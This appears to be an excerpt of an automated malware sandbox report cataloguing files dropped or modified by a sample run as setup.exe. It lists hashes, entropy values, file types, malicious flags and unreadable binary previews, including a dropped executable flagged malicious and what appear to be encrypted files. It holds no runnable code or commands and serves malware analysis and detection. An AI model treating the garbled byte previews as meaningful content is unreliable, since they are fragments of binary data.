              SSDEEP:12288:yvOLBKdt7ZENDZsB/JQ4aKVmaS4aMz8Pg3lxJo2cvXt9:qOVKdb2VslBaKVzaYcAqt9
              MD5:69A748BE5F4FA2B3D28E1B1103347B28
              SHA1:608C11F56C0BF03CC353349BD0C231F9D77817B8
              SHA-256:523E408C321C7BEC469190CEA3B8B6BB19CE4CA6174CDE88F4F14A975EB11890
              SHA-512:2D0AEA186C10C2FE00433E9EFB5F57B8490811E845BF80599A47FB875095A3D77E4F2DDEE8897126AD8859F1139FC6812D671760B949651795EF43DEFA34B192
              Malicious:false
              Preview:Micro.r@.VN/%'......jUm.p..R5.....@.`1...9.l...5.&..H..A."..-.~?P..{m.....8...%..,...X..........A1k.:+.5..| J.....1.@...!..6....[U:IS.c.FJd\a.......ez.<w.2.>.<...69.jQ..3....;..gx.s......'.H7li.s...|.......bK..T...).|=}..u..3.>yg ../._...cnq...!$$C..D.z.;s.,[.0..fN.l...%oVv.....x.8..........'."...Y.~.K..l.Ez7.l..YC..[..Q..4Z.=k.[?.GV...|.N.}.....;C._.C....+d...0)m....o...3.wYp..:=!....2..|=}..}PU.F..v.c..J......Z.t..R....r..3.kR..f@.Rr..*.&#..V...)..J.. ..6..........{..e..m.pw..R...n......'..."...+...7\.s<..c..`rz6.5.o.....PN. y.{....."I!..:.ow...oXU1F...[6..."...d.>5.Zo...G*...L.8.<~........+49R5U..._(.t..[...0.A...l..w..1-..W....P...m..x.........Z...`h..."..E.]8...<7....m....U...v8....Uz.O....9.....xO..../........r...'..g.]z.xsGJ..(....Xp....Qe-.SY..&.PeiAr...j;...Ol)..1...a.lL.....?D.;...ybE1H.g..I8m.YZ....)..p....k.......p...#.+.l..7,....a.Z..r...:.d...%..f.....g......._...../,.g .....IYnLW.#f2u.y.7.g.....~N.......j.......yt...1&
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS-DOS executable, MZ for MS-DOS
              Category:dropped
              Size (bytes):760142
              Entropy (8bit):7.9153015716960144
              Encrypted:false
              SSDEEP:12288:szc8BjgyaJiEb2N43oEFdodmbI+9KvWzFk0QCsX5D7rIOpw9P:atgyCi2SSDd4L+9KOzWdCI5D7EOa9P
              MD5:057780D69BCA1E7B60F44DDCC6B67F29
              SHA1:E6199988A80F058A0B988C0D09C7489D8C5D7859
              SHA-256:8B8A9E373E346F46B25C6685EF32881EA9FB7F1B71FEEAA520AE34097539D709
              SHA-512:26F232533B52CA5AF83127518EB122C87D5EE5D7189EF7D6399D3FCB3ABC18B874D5E6FD15D231F5D321018976A544EDC85BC97152F4C7FA88BF29AD2751D282
              Malicious:true
              Preview:MZ......Ui.}T...F....../N.....ez..U..r9d......D..Hp.d...W..B/r.....L~...B.-.Z....w#..ZG.K?......b..>ayr....#..L....4.....y*..1n.....w..C.Cr.FL.5.f...l.;...._.\.+.rn...&....._..t.....5g......P.dA.yh...y.y}.K.7..G.K6~\.*.f*...q@8b.y.......@....a..$SJL....m.C....h..?..\.~......j..Q.{,.)....Kiyr..?~~+g.....e...t.<....{Y!5.P2.@..n.Bf.......o.].1..U..</`............)....:@..A..i~kO.\.Y.'.>.B.....c....ID..nx....U..-..m.....-.x.\R...Z...]4..:v...gBY..d.".....S..0.z$.B...z..&A..1.O...q.x.l2K{.."e.-.T4../e.=P..wh....B.Q.+R,i..+.jQ.J....b.....W.).YeN.S>9..I#0...H...\..G.~.`.,G...5....h...)....*O....6. ...n........^.j..F._..y.&.....@.:......C.%.b.|].._E.V...A...C.9.1..tq.....2r..tC4.Nw.'8.o...,..9u......h"3^|.y.)SY...PAY....j.e...a#..... ......+{.R".M/>N.s.Uig0.i.fk.x-...w.9.K.r.'.h./.J..6......T....../..D........C.[WZ..5Do5#.Sm..8..U.`.9........1b.......e.w..].A.`....0..I.Y.Y..X.q...:~.P.c...>...3..`..n.X..X.n-..s{.^. .N.?..u....A.i...?(...,s3p.w....J.'.3~+
              Process:C:\Users\user\Desktop\setup.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Preview:[ZoneTransfer]....ZoneId=0
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):783
              Entropy (8bit):7.729299069237043
              Encrypted:false
              SSDEEP:24:p/VtLlNzdpkzxlMxVRGGl4mOx7WgLiWbD:FZfpkzxu+mOx3LiED
              MD5:A24A7319C4BCB8809E1F3C3980E7FE44
              SHA1:95E1414799DC11D2EBB5618FD42B578A0F3AF8C1
              SHA-256:41885BB5AF9C1C9469DD4F5283FF0527C78E70134BCDE1FCE9B73EA66C5877D8
              SHA-512:48F592BFEF29820298633F570199575463A05BC9FB7239A6BA20A6046A57186CCFD290A694B935CBE8B74C59CC377E230B1F1C0F501A661F10FB454DAFA7E291
              Malicious:false
              Preview:<!DOC...d...&..,."..".1r.i.,...o..T[..h.e...G.....R;.e.=Su`i...T..vmZt....6.....M.t.T.]......XG..@.....9.o.9.=<.....zL...D:..l.Qhv.}_.....|{T.t..3.n...j/:{.%.o....&.U.j.2.!..{DJV.@.!.>d.7.&.W. 9..sm.e*$c.MXK.B.].../..7.U........~..".B...K...i5eQ...|.$....a...#x....A...x_.....(......W..5?v..o+.(..$k8].-Y-.v.$2V...t....7.e...6o..7...V."..H.".i,)...u..O.G.0>u.,.....%Z==.z....$m]..e....o.J<..i..%z.s14RN...#.q.kv&.3 VA..&.4...=....."'..I.3.V.Vb..T#g...Y.`+Q...1...{3............-....U.....t#+3GM|_."V...dOhR....../....).."N....t.D.;..t#.........b.........\.*.[.e.+6..Rqp.}.'.u....'..5H.3n..:....7.."2....sL.]..V..Wp[iR.........Me....F..'M.....gMt..,W0N...aw..^....K...C.9..4VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):67138
              Entropy (8bit):7.996930447667544
              Encrypted:true
              SSDEEP:1536:vMNxI1cgzSGdGAu/6K0dp9Civ+OY3GRW20wdCVWkOlj8UwX0mmUUgv29NVk4:vSxI+QdPRdiM+h2pC9Ox8+vIYNVr
              MD5:B5177017D7633F241EF960694D77C5B5
              SHA1:EA65120003EFCD1548932DA205C3D5D1A10C0959
              SHA-256:254C2EC5F813BB518EA4E7A04D7DA4F1D264D0A6D345E17CAB9B2EF8D9C6E30F
              SHA-512:BA3417777C7102D9802E1316B6A37F9001426EF5C072B506D6F22FE4C0318843737A64814D8048A0BAABDE300CE4DFC9A148F0A28B9F543E434A7BD290B3388C
              Malicious:true
              Preview:0.......Dk..7_.,]...[..5.d..9.O.+`....AID...yBq...^..C.$.oc[T|..k...x(.=(W....PgC\.B..d....W]6V\...F.,Uh)....;a...=\.....s..."L3.=TxsB..y-.{-\..j......A....G'_I..}.,z^...*b.N....I.s.....4!..`-.f&.Cl.I.2K.C}...b..7&..l..M.......A..1-j`.6,.......k..}.f\...y.j.I....^....{.... E..,.-.........u..&...>=i....F....X....}{....B@B......)..$(........@..j..........'lp.D-...+.........H..c4...nlg.h'`...S,..(....E.Ql>e+u...._.....2..I..>..-..'H$.W....P.z$. 2a.f^.....t'...uj.s&Y.....5.|4. x...^..h.~...o.A...}....*..5...bX.w....u.[a5,..j.....d.".&. .....Uq..$^..%....'....(C......&[p.......,....Uf_".D1.O..F.S<.lF.F...G...-m=.$j.9. ...vz..../M....j.(r......4...9.........TB.y.......Wk2..wp%..b.}..!.?>c.D...(..-.....3.s..._i....l..y.....6Qc(..^.(...".,....x...7...C...bzK.3"oM0......A..."..k.=G...\A.j...7...W.>...m.2.O...$..~A.].._.Q..NI.$w[5...D\..z.h.+.].q.p...^...?2.....Q.O..|.O..+.k..<...=Y....e...v.....\C.|u.^m6Y.08=m.....[.n<....Q..N& <......%.:r..>..7.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1071
              Entropy (8bit):7.802958576743129
              Encrypted:false
              SSDEEP:24:ye2zi3btHGGoMIQxpUnT4rQikxNh/8I8vHmkuC22DOua6nbD:y8rtGYHxpKoDENpB8buCEfGD
              MD5:AFD9F50C89335656192F0668165195C2
              SHA1:8A95FDA416C958E9BD1BFF461C21825E04D62CF2
              SHA-256:F86A689B974E8BE1E31FDFF1242F64C2F37B825F2F4AD7C7D302FB48F9145E7F
              SHA-512:F802393455EBEB5923BBE0FC5900F191926BE041ECAB986412D67E8D09473D2FFAA9228C53DE44E23F208AF4D11556E79B281C1B361ADB143DD617C97F6A54FE
              Malicious:false
              Preview:0...0}tz..,....d".A...:w.........sn.aS........Y.F..!.7..I...w.;...-...j...oY.@.DG.V.._q..<....p]0.Ijb.j..wD.d.......+.S..o..2..U{.v.s!2*..-v.W.:..S........."&..c...n....C..$e..N...........Sp.........A....s~.A.s.E..`Eaa...e.=..<......7&.1.....P.).....i#..\..'......}..F......._.|.-..j....S[....!.~....p.f..q~..].=.-..`a...=$.$,/..e..J........F.1...E.{..D.....1.>s.e+Go.K:..LBac^..W.3..<1.=Zb.P....p...@WKE...l..A@..5..g...Z......a2..Oo.A.-.I.sA7P....[^(.4.T...#dQT[.<.h.}}..b|..!s..U..,."......[......,......Q`..UQ.?!i.!sk..6..8..r..-2.....K.d5Slv\w..Un........s.`..g].Qm,. .aE.../G...Z..I.y.....G...".....>.].W..0....f*...^X...!q.n.>..'..q...)f.~.!9.@.'E.............x......(O1]2..(..t.z%!..sr.Y7_.....|G....Ix1.....l0^.k>..!..v.;....-e....1<.I.B.P..)..;.+XpqQG^Z.......*.s.Sr@..#./..*.....0..b....j.U.s]...h..E.....->....R!MYG.x...L.\...P..|_....!.n..P.....c..2Pb..D\...^=....\<....JHr..U..K..KK...Dh....n.j...C,x.F./.a.Z...QM.2.......{.*..p.z.Y/.6.<VrBq0iL
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.8626091317088855
              Encrypted:false
              SSDEEP:24:dJQ04Q50X4liGBb/ikInFpi3qxgJbQj9J1jU3CZI6mkrb+f86Zw6q8lbD:vxP5HGn8q6qT1jU3C6KrbU3wCD
              MD5:4D1CDDA876F5074BBFF53114542235BC
              SHA1:C154987BAB583A2770C81E6DA8A654B7A9A93A73
              SHA-256:F6351E5F506BBADBF1E7B80F6E04C5F0B3699170BC631E7CF3F894202CCB8C8A
              SHA-512:F5C34303183B4CB1E3EDFE4F2554EBB02F36C3B82F8200D281C72446259035901CA2C1F78A7F085309F18AD848C7CF83F1EFB71E28A7F08745A0FF6B473F8A95
              Malicious:false
              Preview:PWCCAq.j........I..i.pN..kCv.e...._..`.,#.g......+..@.9.[;.%L.=L!..OhI.v|G^8...I..8....\...{H`?8...D..E.z_.wD .\.V0.<.T<...M...\2.Rl..2..@.".q..z....o.Q.o6.F...e...A~a.6au%........!#E.<..U...il...Y......`)'.....N.....g....C..lp^....G.ZpK..ZW..m8..."..<..N.-h..D.H...nU....>.Y.R:..>x......o..i....t...<.....amRD..Gz......3>.vL.j.5.2../...?.F.Q...b...,.W.........u......14..o2.H...|...q...t.a....7.nE.....X.'.>..G..;.....4$w1W)Y..(....., y1../..~ .A.]...uF...>....P]...I......m5.G...J.L]8... .......JV.qj.......v..~....(+....-`..H.1..h..z...%.+ZG.....0.(3.....~A\79.p.z6....|.~..(......h.V./.|.N[`....t......wgY..9..s\..B..1....=..........Oc...._.3..V..@.......ag..........=.......d....)i.:.%_..Ck_.K$...X?....;...c............I.#.^....y..>h...}eu..[.OU..........-48O..xy^......t|.7R..?.$3......m..<Y.k....8._...8.x.8...-G...R..6.*m.@.p.OU=.n.c;.P.BF......Er.".)..&....o...~........[.u7.;j......_..........).......N...E.?H...r.K$.&....'.4Q.T...e!:.5J
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.832860686332046
              Encrypted:false
              SSDEEP:24:4KbIElL2VwHFmWxxrBIIKuqFDL4A2sQiZK/PUQo20hWBaPUcS7Y5bD:l8Ed20Flxxr+gqFDL72stZeP00asDk5D
              MD5:A74E324D29003CE3F70271D951DA0497
              SHA1:A4395D7E540B4A94037BC9D66950001FA949B5C8
              SHA-256:845C5E71A1B5B60A481ACD1A84057CBC2AA46ACF8016865611413A769D894B05
              SHA-512:0DDD5F328D244C24A9E7AEF902072F9085EE2B9F1EE06038069372F96D371520A3920B58DB0A8CD4260A8C6819AC5518160DA842D7D527BDA25D9F22F1E5565D
              Malicious:false
              Preview:QCFWYV..s.#UqU.^.....f..QK..........a....}t.o.$.(......7.......1.U..r.+...L..37f..7.....).Z.....1s+..NJ#..b.VN...:....`._..Q......1L..f....=.}o.6sZ.. ..o..H.B.o.M.........E.......!?.i*...$._..8.a..I.e...|..:..!;.....P........&g......7..B|^.5.-E.W.f.{U"...JR.....TPZ.....).oT.(...o3..5.go<.s..w.X..u5c...I?..S.[...I...d...FG....DSd..1.J8.@t.(.h2...!...P.S.....7b...n...H.L.l.J.dt.......`;Ox.........`.p.5......&.|F.c.....FO......3 !F.:......S..J......-c'c.d.O.a+.o.^..l~.ExY._.(.....MO@nN.n..?#.k|..8.Q.......i=....q...v4...R.....`.A.. .C..m..X.).F...D.0!...e.!.V....S....T..7w...9...:.O...-\.-3.h..#..J...h.D.....h.:z..7.....0..-.,g.....[g.......f......kI...IsU\.+D...?.. ..5...7D...@t........E...J...1....`.5.S.J.........0..u.26.A.kA.\.$..?......HW...H.Tp.}A(..9F...A...i.R[....<....4..&....Q.v..........|B..s]+y .T......./.N.c..@..h6`.W*.z........K....z{...WPpr..).e.##...l....,K.csN...6].A.Kd..I......CM....-.;.....L'S)l._..ZM...{..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.848689130415608
              Encrypted:false
              SSDEEP:24:1or5LV4pQgVbLwrFMLZ+w9diAqLSqqgTnDlmdzirYHnJS9Oa5CREAZQgDybD:4V4pCFMLZ7vipObgtmdnw9OtREAvgD
              MD5:8AEB4122CF81555503881FBD7829E71F
              SHA1:3234C14114C7D5B4C6451DCB4AFADE273DD001E5
              SHA-256:1F1B41036ADCF33D93EE7F32616F228055D71311EAE1DD7E2BD967CB3D228802
              SHA-512:2C02ADE58E0E5DCD4BE3DF08EE393152D2C4AAA9DD2C5D0FB075AA1D57D98DECE67620512106A409B1A8C458B9B81BACDF916E8206EAD6747609F5262E0CE863
              Malicious:false
              Preview:QCFWYJ.v...-vxC......i.n.....u`|..Y.Af..j..Tz.F....Z...._f=..J..8.K..9..............X.`.G.zkV.)...:H...ss|...YGZ...=.Fs8.&4$7..Il].K.f.._..$9.?..........._.(j....|....,....T.(....E.....0.]..(..q%|.Iz}.c.....z.>pDcjj.E..x.....^../w.Y........G<Cu.`?..e...\........DaN+......h....T.&.ZX..].o.l.4...H..D.!...h....dQq.....A#k(.(.\fO.y.l'......r.]A.....).+...5..!P|b.._9.dZ?.S>.......0)...'..p.-2K....}./..x..#.`..T.v..b....6a.=..:..^.c.M9B(.?`tU"Q!..~H.6..0.X.K...4...v...y....pm..x,G.....U...FN.5t..&..eh.'d.!.(..e..........D..H.s.....(.EE5l(.f).a}.Q.sF:.Kr..J. .Z.... ...."..q4......c..E.A..-...@.(~.../Z....;.N..|J../...$.K=..... .}.q...3Jhav`.+y.[*....3....G.u.... ...V.6%.x8K.[.#..`.b......q...oT.j...u....g...=<.....D..N.Ki..pX......4...."2Lf./.q(.....t:l.j_.0...x.)...........D..H&........&>....4..."5>h|V...U.YI!..jX..b2.).\.Q..V^......v.i.z.......D"..q?...My.{.eC.|.>.p.kF.4..@..}{....31q.h...+.z0F.....e;...;.oJ.!...09y._......%.......L.6.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.8526715034766355
              Encrypted:false
              SSDEEP:24:ddKdPQU3h3vlODrJUdZk/hLXN9ibwsaUIPMXcobiWzPi6qPs9vZ9Ue+TbD:jKd4OtvcAChLXSKfUXc21ji6SuvZr+HD
              MD5:51A056F6235B5334890AC9857B561B57
              SHA1:3E96C3AD37C72DC7E2280FD7D6B8A8435F8EC3A2
              SHA-256:A7C451414654982A68EF099CD45D4662AEF8B0C7B017654F7A3D5286601DB546
              SHA-512:07307A1A61181C90A0D652BEFA36FBDB2231D0E46A70E569980FAB644D8F48D97DADA878C8710D5E5479CB292C4CB53903CB975489EC201A481CBA3F19CD097A
              Malicious:false
              Preview:QNCYC..R.\....t&.p.Es..H...L...m.|.DSu....j.t/.......2i...1w..z....(..x.2..@.6...d.......h.ikF. ?w...h..|...2.}..@..2S:...XO.. .e.Y[.GpT..@].).[.lh3.h.?)xY...G%....K.J.....]c......V.{..~_..s......T........w.[..j.....n..8.....'6...B.............n..~...[,.6..1..+phT.FD$.71..g.J.}!.K!.}.}.KJ...&...S#.j..t1./...Fc.......:$.M..O......h~~.Y.k...3..`.,.z..!a..bi$.".7L....].iK...j../....q{r7.<.{.O...7!.(..QF9..+.;.d.....#.....%...../...,p.I9=-..1....>..8..'.......$....=>..+#.......\..V..&E..g...v.b........Qg.A....m@Z[I.rM...2...../..jX.c....N{.Vl......`?6./...J.S.`.QD.....%+* 1.i.k.$..S-P.3:#"...;s....V@.......k.m])...fh.`s.S...2.Y.`...Oga`....s..:...|..~...e.uB...@S.r...H*s.....J.<.6d..:...D........M?.,....xM[bG'.O....../.&d..0.>.B..jz.<...?.A...a..^..t.wc..N.,.N.K\<.....h......V.R..{%..;sw._.=^7s.s..<-....b...C........v..\..."..FB..T........... .:".8u..J....<.......$.[,UC.P....6..W..P.......G....[m....n...i{;....B....ko.z..|*!...E....u.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.833659234841941
              Encrypted:false
              SSDEEP:24:52PuDSI1h84chTCI9J1OI+n2Z91RdEeCKEAcacOzNhH1GlRS2kfbD:3nh8bCI9J1OI+n2Z/UeC71ajfGloD
              MD5:46D26B83EB3E0C7CD816ED600C6AC4BC
              SHA1:F48F7587E0BB0DC0959EF04A5A1651AB09E06244
              SHA-256:491826799CE63D14BB694D61D1F85A55B2C93D6496AA01DAEB83EC26FA822000
              SHA-512:96E0CB9152F814F943F8444EE91F83D9D4E5816BAE1DE0140DC0D529AC7C3CF0F2DF074322F5E2D17DE7E3D00E13ADDF74D07B2DEC7DCAEADE17F9C9E33B7749
              Malicious:false
              Preview:QRUSB.N.0....*/....6.......uA.....h|.^.f.pub.AgN..c...Ns..8E|g...79HM.....*..L(@PwF...6....Q".8D.3_DO..$..V.]...2....=.3........6.)l%.J.\......O.,!.S..YM..jX..s..rd.f...`..../...mg3l..,...c..Ko.6..*?.....7.}.G..........3..r'-....PJ] .#.Gu.c:f..@3.9.3...h...C..hd.t..$c.Z.}x.....d.Q...,..6.P....m.x>..,_E...>\..y.u.L.l.......A)g.|pI.[..C.W+UH..72.*.Nw.w..{.A..6.U..;.jp'.u.8.+.h......g.\@..)..p.Re.0...x\..Rx...@.k.....a~.5 ...]t\.._.oq..+^..CWW.8......F.zMj.P.J.%....^0.!.Q.B.O......6.7.3......q..[.,!}...u.A...T..........]H..%K.9.,s............j. -"]..C.$`..(6.o.L...-15.c*....._.F.n.....7q_.......&d...<..v.*.....a..~lE.=....J..{]=+.x.M..m?&/...4.0P......U./K.".j.$../2+.O.AC.p....f..{o@..S_0.......5.p/m.W7....i%....c..m.M@.T.Y.(..-QO..+-g.p.G5.\..Jm{.......L....L*..j....U...n.Z9...X/-B.~.5.).2..&..H....}....N......J..DKZ...q).y......u..A.9/.Bs.......b...`.......c..4k........jx..&..~.K......d....,.+...j..h..vI.L.....|..X.*.X.J..fp.Q.4..."..5~..f).
              Process:C:\Users\user\Desktop\setup.exe
              File Type:PRO-PACK archive data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.837825688420467
              Encrypted:false
              SSDEEP:24:iMzB2htMdMqkb03o5Rz1qdwmaiSwlCjlrE1oYY7Ip3byaRTSrnUodfk6TbD:vzghmOqksICCmai7CjlgAIgbrnWqD
              MD5:C2F9476A1E7C4D7B7055DC48F34AEDA5
              SHA1:46668856A98C7A9C88EB749E9FA601F6EE7F01AD
              SHA-256:2979337A50005B06A9CD081ABE7E41BC6D082D4DE9BCE1E3E60A9EC44634FF1D
              SHA-512:3F58CE5A44DFE50165597946D61E91480BB7C50779F79821A0F04FA76C978D0A0704B8D62F4658EB143C5044A5939D07376D057F6E941BD783FA0A60B233B698
              Malicious:false
              Preview:RNCDI_..ErF.\_..W.KX..W..`P......d..}...J?.U.P5..J.R..Y...]..%:4..{{o2...S..F..7.......0.m7Q.R..i.9. o.3]..Pg.. ..9.....*)..?..ASy$...b._.9.xo...|pO..qku..A........&.S..Y...M...&c.<`....v..)b/)hOT.[.(v._b..~>.......14..0.o......!..... Z..Z..q...W.F....[..D..(..t........N6.;..L...fCn.:....b..I.}..T.j.&.U...oG?\.!...!....M.ng#./..B....PX...d?.9.2J.CV..u.T.Z..a...q..R. .......m.W.f0~S......?.....B....9....R.....C....a..N..F..gO.E..LA.%......5.5.J.v......x.......U!'.*.%..e..=.ma9(#..::{R.7..87..x.6t....H..9^N...6cq.....T."Q.}j2Mc/.X.....-.......=uz.H!@.=.W..^|.....5D~%a..u.{1=.rvh)..<.#.vB.`..........t.d..m......1..."${.a.../...gI..<..-.m."...0o.4.U..o.............t.)..3I4.........B...\o5U...J[...`(..O..m.^q.{sc.p}...'t'....J%m.#.K..#.$.JZ...f_.d.8..oh.U.C.Q...<..0....C.|..._.a..&.....<.....d..5...5.f4...#.........h......;...g..=....<../(..|.Y....B~._h..C.88.......S.......cY6.q..=.s...*.m.....K6.S.."h..?.....A"..V.CCI?9..K....1.+}.c.g*....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.831499689204198
              Encrypted:false
              SSDEEP:24:EGkZyROnDgkUk69Or8M+nO5Xa/3kDhd7ZWtmTwEOKXlOLbm9DBH/1YbD:EXZOkqP6XUYd4oTG69DBH/8D
              MD5:E99E3E31ECCD410A02D270DAD1AF5472
              SHA1:D13C3E4BB5A8649844288297EEE798FFBE2A5B12
              SHA-256:BA4F59C92A091849CF3C5BB49806BE9CCBDAC698B12E9FFED2A0D6D00718E890
              SHA-512:7FC20D99ABCB23239A05AEDC4E4BB185C79838B4124CF66AE0A35FA27AB78A6F8E4150DF4BEB48AE192AFA7D047BFAFC226423EBEDCD1A02CC6E2EFC5D06FEED
              Malicious:false
              Preview:SFPUSI"q.y..N....C.Qc*|J...Qq.,.5...8.7........Mz._.....t......*$X...x...<.;4.x...h.a.>........ ...z?8.M1.....T.q&Z............-.%...4.;@.i%&...l E....H...:1.q:?..E...b..*..Y.K..R.e0..m.....x.B9.....K..[1.?..!...K.B+&.At.........Q..&~..&b#+@.'}.BS4..../.u....Y.;(:........_".iX.N.X{.N..E...h.EB..U?5...@"....~S.... 6..s.^.._,..K.cc..........DZuy...U......Ri.?..9K.o..'...M ..Z+k.I..;7......T).`.Mi...R%.j...C.&....Xe@.5.L.!.9....s.......Q..2.......k....r.<v...6../.....psX....Zeb.U6.Q..B....R[.....0....5n/....b.@.YE..,..?.*%.S.j.u.r.L..v_.!..\....o.>'~..E..vf........Aa....PQ...@8...5.I.M..).j.....;F.fXJY..).#...x."m..MO..'u.X.*..6.C.Q.ye.O.....y@.WIu...G3K..F..H.H$.....&.c.I...L.....L.1.{..V..9.t-...uF...f,...{...3..Z..G..._2..k..G...Q...yD...&,...0....k,.-X.t..0.P......q#y...........?...J......(C..)z^....*......!p..k....y.$.vSfy.]naeDB.;=./!....c#.p.....(...J..z\...Y.c!.5...E;R..k.C.D...G~u]m..D.....{].p..1......z..8...22.^...`47..b.gp....`.+...{
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.849584943295278
              Encrypted:false
              SSDEEP:24:V2coCSesNg+is1eDqUfADUea0P/kOrFTzRoqMEdmKjjbD:V2cr37r2eDQUez/kUJfj3D
              MD5:41632D36C01D1FA1779BFF09AB43B368
              SHA1:5F45859C07A1EBDDC3ECE084934EF02F75D8CF61
              SHA-256:8B561A3FE0BB18C3FF0D4CB215DEBF588734B3634AC5A9184447BDC37DFBD718
              SHA-512:24BFAE020B6D3C2B6214BAB52739245BEA0CFF638B3DD872862F9A2C7AF7154757C215E5489D290C858581373FAE0D0D0EC5AB1D89573DC295042AD92E0D58AF
              Malicious:false
              Preview:SFPUS.....W.N.:S.5F........v.{"p^.K...|......K..:.a].`.3.....G2....#..S..l..g....W.u......%bK.B...s.;{.5.1..*1.c5e81.x.H...hLgMh.!...4I)..|.t....D....d..w... '..a:t.?]...#;..u.e.(.*/5..%.......=.IY..6...e..P.a....Hoa.....n>..E....QS...E...>.x..S..^w?T.a..B...*.I{S<8....>Oi'l.....t.|....;.....?.aVQI.G,.....j.B-.R........`.9...j.SQ.r.q.....)..o/Mr..................H....BC.t...U..<...cG..`.r.#Hkg1g.....j.(.i.%..Vm.....Df..F}..(s.....[.`......s.!>./=..j..1(.#.j/.sT{C!. ..PE..n..U-.../.......u.]..6gC....!..s.....q.......Ub......,...3.......C..n#.j!.7.1.(]7.........Mp..1-....*...P..5....4.e"..d......n.%....|>\Yd.....mJZ.....5....%.}.%y..3.v..N.rB..^...@A...{d..G.=.....1yx......\t.G..../...s.....>...nN..^*.DsNv.~..).A.....!l..eW.I.....U.F......"a._....mP,..E.3.H...'..3.......=..o..%....=.D...}.R_^...1...[..W.<u.....D..!{..T'B..+.{.D..4..O.[..3..9..d.&..EJ....>o..V0...i...y........sT........U...~n...;.xr..GO..GZ..^....&.....h......x+..=...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.850965416624079
              Encrypted:false
              SSDEEP:24:5E5xinyDBMuvjrDxkY8uCRV9Jbw+ZMrwMlckZMbParTC4i299VO1oobD:5ZIMuntuf95NWZmorJ7VlyD
              MD5:1C83E9365DF9479D225AA73DCE9014F5
              SHA1:F236AB206FCD4349DF4D81163AA12DF8EFCF2745
              SHA-256:1523B7B0D319BAB8AB5C97281C75377EB3639C95E2CC194FC0A663B1B0DA738B
              SHA-512:F8779A9750ED61411AD1338320BF736E53A4F58E7EC821B36117A282A0C9E2B811C4F981141849A86C7BB0A470B0D76D64FB3FE867DFBE8CDD4905D38ADA77E4
              Malicious:false
              Preview:UNKRL.......af...:.Y.Oy86...AG@"*f.?n@...c..J<0...gO.]]+..<...Hj.D.?....Sk.>..P..[..R.....;....\..+....}...1....t@I,....Yex..'K.....5s.pR...X4z.L...P.!6.d.5..DW.7....m.8.....&...+8Je..!......`...Pw.h3..kz..9iq.N@c...&w.....,.f.F...P..w.p...:..eD..+.p.~*Gc.._s...$.e......u....=+ .F..'.=.........'k..1...m..Rk.aV.T..1-..e..R..3g..\U:.3..*Y`.Ls%.sq....U.z?....?.....S...I..S]X).&..i.O..T?...d.',.P.;L.`^.f.>KH..c......c..4nA.a.....^.e9d!Qs.....G:...A97..1Q..j=.U..T.....s.C...Oj.X..|........?.S.....M....{_......u..&...i3.=....P>..C7....d.h.SG..T.Y.._..n...A...4....vx.w..g..^...|.U...D.*..a...@7.. .*.a..L.".O....+P.W.9.....o..l..@...;..V../X.<4.......sF/e.Z...........F....e.Y..0ooX.v......r"E.;.K.6..%.S_3&....R..?..JF..m...........{..H6.......'....f.%3G..~-i..Y.._.. r#.)..._".m...p6O....>{#..E..w..IZ.c............]H{7T..L ...<.w].....A........r..PX....f....m.3..s..W....~..y...a...$.....C..yO....5.!n.).-.p=Ym....d......5..$Se.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.858463795723438
              Encrypted:false
              SSDEEP:24:1tXBCDYlUA6hUkI5iI2wH8DjljK7UsbEmrSW2K6/QG19bD:fXBxyhAwwKledbNSW2K6oKD
              MD5:AE64C70E489CB79816A5E8D51D3030A6
              SHA1:C0FD8A1AAD8D46EF927A87D2AF9187CB1EEA82B2
              SHA-256:5CC8B5CEBFC5B1232C11C18F27A195D472007693330E1C3A5D79713DC836ED2F
              SHA-512:7CE49C95F6A4681C4F7A1130A710FBAD2CA5E61E74A7FA0648C67E8C256EB209EA762293C0305AA10274A1F4A5067215A87B7DF5AE8B850B1D91227BC9E82802
              Malicious:false
